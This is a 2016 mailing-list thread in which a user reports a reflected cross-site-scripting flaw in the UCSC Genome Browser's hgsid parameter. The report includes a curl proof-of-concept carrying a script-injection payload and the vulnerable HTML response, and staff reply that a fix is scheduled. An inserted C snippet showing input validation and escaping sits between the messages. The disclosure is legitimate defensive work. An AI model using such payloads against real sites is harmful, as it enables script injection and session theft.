Security Issue with Genome Browser


Elliott, Oliver T.

Sep 30, 2016, 2:22:14 PM
to gen...@soe.ucsc.edu
Hello!

Our lab is running a local installation of the genome browser and our security dept. has identified a vulnerability in the browser's code. It seems the issue is that the input to, say, hgTracks or hgGateway is not sanitized in any way, and this leads to the possibility of cross-site scripting, as in:

$ curl 'https://genome.ucsc.edu/cgi-bin/hgTracks?hgsid=%27%22()%26%25%3Cacv%3E%3CScRiPt%20%3Eprompt(911920)%3C/ScRiPt%3E'

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<HTML><HEAD>
<TITLE>Very Early Error</TITLE>
<META http-equiv="Content-Script-Type" content="text/javascript">
<link rel='stylesheet' href='../style/HGStyle-v338.css' type='text/css'>
</HEAD>

<BODY CLASS="hgTracks cgi">
<script type='text/javascript'>
document.write("<center><div id='warnBox' style='display:none;'><CENTER><B id='warnHead'></B></CENTER><UL id='warnList'></UL><CENTER><button id='warnOK' onclick='hideWarnBox();return false;'></button></CENTER></div></center>");
function showWarnBox() {document.getElementById('warnOK').innerHTML='&nbsp;OK&nbsp;';var warnBox=document.getElementById('warnBox');warnBox.style.display=''; warnBox.style.width='65%';document.getElementById('warnHead').innerHTML='Warning/Error(s):';window.scrollTo(0, 0);}
function hideWarnBox() {var warnBox=document.getElementById('warnBox');warnBox.style.display='none';warnBox.innerHTML='';var endOfPage = document.body.innerHTML.substr(document.body.innerHTML.length-20);if(endOfPage.lastIndexOf('-- ERROR --') > 0) { history.back(); }}
window.onunload = function(){}; // Trick to avoid FF back button issue.
</script>
<!-- HGERROR-START -->
<P>invalid unsigned integer: "'"()&%<acv><ScRiPt >prompt(911920)</ScRiPt>"</P>
<!-- HGERROR-END -->
</BODY></HTML>

Just wanted to alert you to this problem and am wondering if there might be plans formed to patch it. Thanks!

Best,
Oliver
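The kind of fix the report asks for, as an added example that is not the Genome Browser's own code: validate hgsid as an unsigned integer and HTML-escape any rejected value before it is echoed into the error page, so the reflected string reaches the browser as text rather than markup. The function names and the 512-byte escape buffer are assumptions made here.

```c
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* HTML-escape `in` into `out` (capacity `cap`); returns 0 if `out` is too small. */
int htmlEscape(const char *in, char *out, size_t cap)
{
    size_t w = 0;
    if (cap == 0)
        return 0;
    for (; *in; in++) {
        char one[2] = { *in, '\0' };
        const char *rep = one;
        switch (*in) {
        case '&':  rep = "&amp;";  break;
        case '<':  rep = "&lt;";   break;
        case '>':  rep = "&gt;";   break;
        case '"':  rep = "&quot;"; break;
        case '\'': rep = "&#39;";  break;
        }
        size_t len = strlen(rep);
        if (w + len >= cap)            /* no room for this piece plus the NUL */
            return 0;
        memcpy(out + w, rep, len);
        w += len;
    }
    out[w] = '\0';
    return 1;
}

/* Strict unsigned-integer check for a CGI parameter such as hgsid (assumed name). */
int parseUnsigned(const char *s, unsigned long *val)
{
    char *end;
    if (*s < '0' || *s > '9')          /* rejects empty, sign and whitespace */
        return 0;
    errno = 0;
    *val = strtoul(s, &end, 10);
    return errno == 0 && *end == '\0';
}

/* Unlike the reported page, escape the rejected value before echoing it. */
int errorParagraph(const char *param, char *out, size_t cap)
{
    char esc[512];
    if (!htmlEscape(param, esc, sizeof esc))
        return snprintf(out, cap, "<P>invalid unsigned integer (value too long)</P>");
    return snprintf(out, cap, "<P>invalid unsigned integer: \"%s\"</P>", esc);
}
```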

Cath Tyner

Sep 30, 2016, 6:25:59 PM
to Elliott, Oliver T., gen...@soe.ucsc.edu
Hello Oliver,

Thank you so much for this report - this has been fixed and will appear in our upcoming release (v340), the afternoon of 10/25/16.

Please respond to this list if you have further questions!

Thank you again for your inquiry and for using the UCSC Genome Browser. 
Please send new and follow-up questions to one of our UCSC Genome Browser mailing lists below:

  * Post to the Public Help Forum: Email gen...@soe.ucsc.edu or search the Public Archives
  * Post to the Mirror Help Forum: Email genome...@soe.ucsc.edu or search the Mirror Archives
  * Confidential/private help: Email genom...@soe.ucsc.edu

UCSC Genome Browser Announcements List (email alerts for new data & software):
  * Subscribe: Email genome-announce+subscribe@soe.ucsc.edu
  * Unsubscribe: Email genome-announce+unsubscribe@soe.ucsc.edu

Join us on Social Media! Facebook, Twitter, Wordpress Blog, YouTube

Enjoy,
Cath
. . .
Cath Tyner
UCSC Genome Browser, Software QA & User Support
UC Santa Cruz Genomics Institute

